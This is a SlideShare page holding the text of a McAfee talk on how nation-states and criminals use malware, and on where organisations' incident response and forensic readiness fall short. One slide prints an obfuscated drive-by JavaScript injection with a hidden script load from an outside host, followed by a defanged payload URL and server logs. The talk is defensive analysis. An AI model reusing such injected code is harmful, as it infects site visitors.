Christiaan Beek, profile picture
Uploaded byChristiaan Beek
PDF, PPTX5,104 views

Offensive malware usage and defense

The document discusses the offensive usage of malware and outlines various methods of attack, emphasizing the complexity and sophistication of modern malware frameworks used by nation-states. It also identifies common defensive shortcomings within organizations and recommends strategies for better preparedness against such threats. The presentation concludes with a call to action for improving forensic readiness and incident response capabilities.

Embed presentation

Download as PDF, PPTX
Malware Offensive usage and how to defend Christiaan Beek McAfee Professional Services
Agenda • $whoami • Examples • Offensive ways of using malware • What goes wrong • Defense recommendations • Final thoughts
> whoami • Christiaan Beek • Practice lead IR & Forensics EMEA • Developer/Instructor MFIRE • Training CERTS
A Little Background Foundstone Services – McAfee Strategic Security
OFFENSE
Offensive usage of malware ENERGY & INFRA Financial MEDICAL MOBILE Defense
Offensive usage of malware Why malware? • low profile during preparation • many options to spread / infect • many ways to hide • self destruct mechanism • many ways to transfer data to
Offensive usage of malware • More and more discovery of malware frameworks • Multiple modules /components • Written by pro’s – sponsored by nations
Offensive - What’s Different? Development Delivery Detection Command & Control Intent • Nation-States • Zero day • Digitally signed • Central • Surveillance propagation with command • Truly compromised • Disrupt / customized • Multi-vectored: certificates • Modular Destroy payloads Blue tooth, payloads USB, network • Outbound ex- filtration masking
Stages of an attack:
Stages of an attack:
Stages of an attack:
Stages of an attack:
Stages of an attack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
Inner working?
IIS logs on hacked ‘landing’ server: 9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe 9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe Dial 80 Or 443
War story
Future usage of malware
Future scenario’s
Future scenario’s or real...?
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
What goes wrong regarding Defense? An Intel company
Problem #1 An Intel company Many solutions but how to use them? Forensic Readiness?
Problem #2 An Intel company No visibility on the network No correlation of events
Problem #3 An Intel company Lack of skilled, experienced and dedicated people
Problem #4 An Intel company No Incident Response procedures No Dry-run exercise
Problem #5 An Intel company The attack came from…..
Problem #6 An Intel company Destroying evidence
Problem #7 An Intel company who is the system owner? who will take action? who is allowed to take decisions?
An Intel company Defense Strategies
The Big “Threat” Picture Threats Threats All Threats All Known Core AntiVirus AntiVirus Threats Sees Protects
The “Core” Security Problem • “Unauthorized” Execution End Users = Data – Payload/attachment/link – Network Identity Thieves Spammers – Privilege Bot Herder • “Authorized” Execution – Insiders misuse of privilege Vulnerability Tool Discoverers Developers 100101010010110 Malware Developers
Defense-in-depth
Worthless without:
Final thoughts...... An Intel company - Incidents happen - Is forensic & malware readiness on your agenda? - What needs to be changed in your process? - Is your {army-unit/company/agency/etc} prepared? - Did you separate critical infrastructures? - Can we help you?
Thank you! An Intel company Keep in touch: Email: Christiaan_Beek@McAfee dot com Twitter: @FSEMEA @Foundstone @ChristaanBeek

More Related Content

PDF
MITRE ATTACKCon Power Hour - December
byMITRE - ATT&CKcon
 
PDF
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
byMITRE - ATT&CKcon
 
PDF
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
byPROIDEA
 
PDF
CSF18 - Incident Response in the Cloud - Yuri Diogenes
byNCCOMMS
 
PDF
The 4horsemen of ics secapocalypse
byChristiaan Beek
 
PPTX
ANALYZE'15 - Bulk Malware Analysis at Scale
byJohn Bambenek
 
PPTX
"There's a pot of Bitcoins behind the ransomware rainbow"
byChristiaan Beek
 
PDF
"Giving the bad guys no sleep"
byChristiaan Beek
 
MITRE ATTACKCon Power Hour - December
byMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
byMITRE - ATT&CKcon
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
byPROIDEA
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
byNCCOMMS
 
The 4horsemen of ics secapocalypse
byChristiaan Beek
 
ANALYZE'15 - Bulk Malware Analysis at Scale
byJohn Bambenek
 
"There's a pot of Bitcoins behind the ransomware rainbow"
byChristiaan Beek
 
"Giving the bad guys no sleep"
byChristiaan Beek
 

What's hot

PPTX
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
byEC-Council
 
PDF
Capture the Flag Exercise Using Active Deception Defense
byFidelis Cybersecurity
 
PDF
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
byChi En (Ashley) Shen
 
PPTX
Defcon Crypto Village - OPSEC Concerns in Using Crypto
byJohn Bambenek
 
PPTX
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
byLastline, Inc.
 
PDF
Webinar: Hunting maturity through cyber deception
byCymmetria
 
PPTX
Breaking the cyber kill chain!
byNahidul Kibria
 
PDF
BSides IR in Heterogeneous Environment
byStefano Maccaglia
 
PDF
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
byNCCOMMS
 
PDF
Hunting and Legal Hackback using Cyber Deception
byCymmetria
 
PPTX
Cymmetria Webinar: Deception & Responder
byCymmetria
 
PDF
Shamoon
byShakacon
 
PDF
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
byMITRE - ATT&CKcon
 
PPTX
Corporate Espionage without the Hassle of Committing Felonies
byJohn Bambenek
 
PPTX
e-Extortion Trends and Defense
byErik Iker
 
PPTX
HITCON 2015 - DGAs, DNS and Threat Intelligence
byJohn Bambenek
 
PDF
CSF18 - Guarding Against the Unknown - Rafael Narezzi
byNCCOMMS
 
PPTX
Defending Against 1,000,000 Cyber Attacks by Michael Banks
byEC-Council
 
PDF
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
byMITRE - ATT&CKcon
 
PPTX
Ransomware
byArmor
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
byEC-Council
 
Capture the Flag Exercise Using Active Deception Defense
byFidelis Cybersecurity
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
byChi En (Ashley) Shen
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
byJohn Bambenek
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
byLastline, Inc.
 
Webinar: Hunting maturity through cyber deception
byCymmetria
 
Breaking the cyber kill chain!
byNahidul Kibria
 
BSides IR in Heterogeneous Environment
byStefano Maccaglia
 
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
byNCCOMMS
 
Hunting and Legal Hackback using Cyber Deception
byCymmetria
 
Cymmetria Webinar: Deception & Responder
byCymmetria
 
Shamoon
byShakacon
 
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
byMITRE - ATT&CKcon
 
Corporate Espionage without the Hassle of Committing Felonies
byJohn Bambenek
 
e-Extortion Trends and Defense
byErik Iker
 
HITCON 2015 - DGAs, DNS and Threat Intelligence
byJohn Bambenek
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
byNCCOMMS
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
byEC-Council
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
byMITRE - ATT&CKcon
 
Ransomware
byArmor
 

Viewers also liked

PDF
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...
byOWASP Turkiye
 
PDF
Lithium Likes to Loves Tour NYC
byLithium
 
PPTX
Social Media Forensics for Investigators
byCase IQ
 
PPTX
EC-Council Hackway Workshop Presentation- Social Media Forensics
bySina Manavi
 
PDF
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
byEmpowered Presentations
 
PDF
What Makes Great Infographics
bySlideshare
 
PDF
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
byContent Marketing Institute
 
PDF
How to Make Awesome SlideShares: Tips & Tricks
bySlideshare
 
PDF
10 Ways to Win at SlideShare SEO & Presentation Optimization
byOneupweb
 
PDF
Masters of SlideShare
byKapost
 
PDF
Taming worms, rats, dragons & more
byChristiaan Beek
 
PPT
2011 Social Media Malware Trends
byLumension
 
PPT
3871778
byChristiaan Beek
 
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...
byOWASP Turkiye
 
Lithium Likes to Loves Tour NYC
byLithium
 
Social Media Forensics for Investigators
byCase IQ
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
bySina Manavi
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
byEmpowered Presentations
 
What Makes Great Infographics
bySlideshare
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
byContent Marketing Institute
 
How to Make Awesome SlideShares: Tips & Tricks
bySlideshare
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
byOneupweb
 
Masters of SlideShare
byKapost
 
Taming worms, rats, dragons & more
byChristiaan Beek
 
2011 Social Media Malware Trends
byLumension
 
3871778
byChristiaan Beek
 

Similar to Offensive malware usage and defense

PDF
Cyber security-briefing-presentation
bysathiyamaha
 
PPT
NetWitness
byTechBiz Forense Digital
 
PPTX
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
bySecureDocs
 
PPTX
Encase cybersecurity alat za proaktivnu kontrolu korporativne it sigurnosti 2
byDamir Delija
 
PPTX
Trend Micro - Targeted attacks: Have you found yours?
byGlobal Business Events
 
PDF
3 Nir Zuk Modern Malware Jun 2011
bydavidmaciaalcaide
 
PPTX
Traditional Reconnaissance and Attacks, Malicious Software, Defense in Depth,...
byMohammed Abdul Lateef
 
PDF
Declaration of malWARe
byScott Sutherland
 
PDF
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
byAndris Soroka
 
PPTX
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
byLumension
 
PPTX
8 Threats Your Anti-Virus Won't Stop
bySophos
 
PDF
McAffee_Security and System Integrity in Embedded Devices
byIşınsu Akçetin
 
PDF
Top Security Trends for 2013
byImperva
 
PPT
Security Intelligence: Advanced Persistent Threats
byPeter Wood
 
PPTX
Welcome to the Age of Weaponized Malware. What Does it Mean to Your Enterprise?
byLumension
 
PDF
Modern Lessons in Security Monitoring
byAnton Goncharov
 
PPTX
Kurt baumgartner lan_deskse2012
byKurt Baumgartner
 
PDF
HITB2013AMS Defenting the enterprise, a russian way!
byF _
 
PDF
Introduction to the advanced persistent threat and hactivism
byGlobal Micro Solutions
 
PPTX
ECrime presentation - A few bits about malware
byMichael Hendrickx
 
Cyber security-briefing-presentation
bysathiyamaha
 
NetWitness
byTechBiz Forense Digital
 
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
bySecureDocs
 
Encase cybersecurity alat za proaktivnu kontrolu korporativne it sigurnosti 2
byDamir Delija
 
Trend Micro - Targeted attacks: Have you found yours?
byGlobal Business Events
 
3 Nir Zuk Modern Malware Jun 2011
bydavidmaciaalcaide
 
Traditional Reconnaissance and Attacks, Malicious Software, Defense in Depth,...
byMohammed Abdul Lateef
 
Declaration of malWARe
byScott Sutherland
 
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
byAndris Soroka
 
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
byLumension
 
8 Threats Your Anti-Virus Won't Stop
bySophos
 
McAffee_Security and System Integrity in Embedded Devices
byIşınsu Akçetin
 
Top Security Trends for 2013
byImperva
 
Security Intelligence: Advanced Persistent Threats
byPeter Wood
 
Welcome to the Age of Weaponized Malware. What Does it Mean to Your Enterprise?
byLumension
 
Modern Lessons in Security Monitoring
byAnton Goncharov
 
Kurt baumgartner lan_deskse2012
byKurt Baumgartner
 
HITB2013AMS Defenting the enterprise, a russian way!
byF _
 
Introduction to the advanced persistent threat and hactivism
byGlobal Micro Solutions
 
ECrime presentation - A few bits about malware
byMichael Hendrickx
 

Recently uploaded

PPT
software-security-intro in information security.ppt
byismaeelsahib032
 
PDF
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PPTX
THIS IS CYBER SECURITY NOTES USED IN CLASS ON VARIOUS TOPICS USED IN CYBERSEC...
byMelissaGblinwon
 
PDF
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
PDF
Zero Trust & Defense-in-Depth: The Future of Critical Infrastructure Security
byYasir Naveed Riaz
 
PPTX
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
PPTX
Building Cyber Resilience for 2026: Best Practices for a Secure, AI-Driven Bu...
byYasir Naveed Riaz
 
PDF
Day 1 - Cloud Security Strategy and Planning ~ 2nd Sight Lab ~ Cloud Security...
by2nd Sight Lab
 
PDF
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
PDF
The year in review - MarvelClient in 2025
bypanagenda
 
PPTX
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
PDF
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
PDF
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
PPTX
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
PDF
Session 1 - Solving Semi-Structured Documents with Document Understanding
byDianaGray10
 
PDF
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
PPTX
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
PDF
GPUS and How to Program Them by Manya Bansal
byScyllaDB
 
PDF
Energy Storage Landscape Clean Energy Ministerial
bySurajitBanerjee38
 
PPTX
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 
software-security-intro in information security.ppt
byismaeelsahib032
 
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
THIS IS CYBER SECURITY NOTES USED IN CLASS ON VARIOUS TOPICS USED IN CYBERSEC...
byMelissaGblinwon
 
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
Zero Trust & Defense-in-Depth: The Future of Critical Infrastructure Security
byYasir Naveed Riaz
 
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
Building Cyber Resilience for 2026: Best Practices for a Secure, AI-Driven Bu...
byYasir Naveed Riaz
 
Day 1 - Cloud Security Strategy and Planning ~ 2nd Sight Lab ~ Cloud Security...
by2nd Sight Lab
 
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
The year in review - MarvelClient in 2025
bypanagenda
 
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
Session 1 - Solving Semi-Structured Documents with Document Understanding
byDianaGray10
 
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
GPUS and How to Program Them by Manya Bansal
byScyllaDB
 
Energy Storage Landscape Clean Energy Ministerial
bySurajitBanerjee38
 
Chapter 3 Introduction to number system.pptx
byGetachewAbera9
 

Offensive malware usage and defense

  • 1.
    Malware Offensive usage and how to defend Christiaan Beek McAfee Professional Services
  • 2.
    Agenda • $whoami • Examples • Offensive ways of using malware • What goes wrong • Defense recommendations • Final thoughts
  • 3.
    > whoami • Christiaan Beek • Practice lead IR & Forensics EMEA • Developer/Instructor MFIRE • Training CERTS
  • 4.
    A Little Background FoundstoneServices – McAfee Strategic Security
  • 5.
  • 6.
    Offensive usage ofmalware ENERGY & INFRA Financial MEDICAL MOBILE Defense
  • 7.
    Offensive usage ofmalware Why malware? • low profile during preparation • many options to spread / infect • many ways to hide • self destruct mechanism • many ways to transfer data to
  • 8.
    Offensive usage ofmalware • More and more discovery of malware frameworks • Multiple modules /components • Written by pro’s – sponsored by nations
  • 9.
    Offensive - What’sDifferent? Development Delivery Detection Command & Control Intent • Nation-States • Zero day • Digitally signed • Central • Surveillance propagation with command • Truly compromised • Disrupt / customized • Multi-vectored: certificates • Modular Destroy payloads Blue tooth, payloads USB, network • Outbound ex- filtration masking
  • 10.
    Stages of anattack:
  • 11.
    Stages of anattack:
  • 12.
    Stages of anattack:
  • 13.
    Stages of anattack:
  • 14.
    Stages of anattack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
  • 15.
    Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
  • 16.
  • 17.
    IIS logs onhacked ‘landing’ server: 9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe 9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe Dial 80 Or 443
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.
    What goes wrongregarding Defense? An Intel company
  • 29.
    Problem #1 An Intel company Many solutions but how to use them? Forensic Readiness?
  • 30.
    Problem #2 An Intel company No visibility on the network No correlation of events
  • 31.
    Problem #3 An Intel company Lack of skilled, experienced and dedicated people
  • 32.
    Problem #4 An Intel company No Incident Response procedures No Dry-run exercise
  • 33.
    Problem #5 An Intel company The attack came from…..
  • 34.
    Problem #6 An Intel company Destroying evidence
  • 35.
    Problem #7 An Intel company who is the system owner? who will take action? who is allowed to take decisions?
  • 36.
  • 37.
    The Big “Threat”Picture Threats Threats All Threats All Known Core AntiVirus AntiVirus Threats Sees Protects
  • 38.
    The “Core” SecurityProblem • “Unauthorized” Execution End Users = Data – Payload/attachment/link – Network Identity Thieves Spammers – Privilege Bot Herder • “Authorized” Execution – Insiders misuse of privilege Vulnerability Tool Discoverers Developers 100101010010110 Malware Developers
  • 39.
  • 40.
  • 41.
    Final thoughts...... An Intel company - Incidents happen - Is forensic & malware readiness on your agenda? - What needs to be changed in your process? - Is your {army-unit/company/agency/etc} prepared? - Did you separate critical infrastructures? - Can we help you?
  • 42.
    Thank you! An Intel company Keep in touch: Email: Christiaan_Beek@McAfee dot com Twitter: @FSEMEA @Foundstone @ChristaanBeek